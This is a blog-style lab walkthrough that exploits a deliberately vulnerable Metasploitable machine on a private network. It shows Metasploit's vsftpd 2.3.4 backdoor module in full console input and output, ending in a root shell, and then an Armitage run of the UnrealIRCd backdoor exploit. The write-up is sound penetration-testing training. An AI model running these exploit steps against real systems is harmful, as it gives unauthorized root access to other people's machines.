In my lab environment, the IP of the attacker machine is 192.168.127.133, and the victim machine is 192.168.127.154.
So, let's begin by port scanning the target and see what's available I will perform a SYN scan with service and OS detection:
Whoaa! We can see there are plenty of services just waiting to receive some attention. Well, this is meant to be exploitable from all angles to facilitate learning and exercise. And by the way, I'll ignore that cozy root shell on port 1524. Let's just get our own!
Metasploit
Since we saw there are 2 FTP servers running, let's launch Metasploit and search for a suitable exploit.
msf > search vsftpd
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
Excellent! We have a ready exploit for the version of vsftpd that's listening on our target. Let's select it and look at its requiremenets:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
Let's look at the available payloads:
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection
Now let's set the remote host to the IP of the victim and the payload to the cmd/unix/interact payload, and review our configuration:
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
RHOST => 192.168.127.154
msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
PAYLOAD => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.127.154 yes The target address
RPORT 21 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
All set! Now let's see if we can get in:
msf exploit(vsftpd_234_backdoor) > exploit
[*] The port used by the backdoor bind listener is already open
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.127.133:57347 -> 192.168.127.154:6200) at 2014-04-15 13:44:16 -0400
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Woohoo! We're in and we're root! The machine is now at our mercy! But for now, let's just get back to the initial board and pick another service to exploit, this time using Armitage.
Armitage
On the Armitage window, let's first add our target to the workspace. Go to the Hosts tab and select Add Hosts, then enter the IP of the target. The workspace will look like this:
Let's take a shortcut and go to the Attacks tab and select Find Attacks. After the analysis is complete, we can right-click the host and see a list of attacks that might work on the target, split into service categories, like SSH, HTTP, Samba etc. This time we'll go for the IRC service, using the unreal_ircd_3281_backdoor exploit. Launch it and we can see we've successfully gained a session:
So here we went through using Metasploit and Armitage to hack a vulnerable machine. Of course, you won't (hopefully) find such easy targets in the wild, but this is a good exercise.
Today's cookie:
You will be a winner today. Pick a fight with a four-year-old.
Today's cookie:
You will be a winner today. Pick a fight with a four-year-old.
No comments:
Post a Comment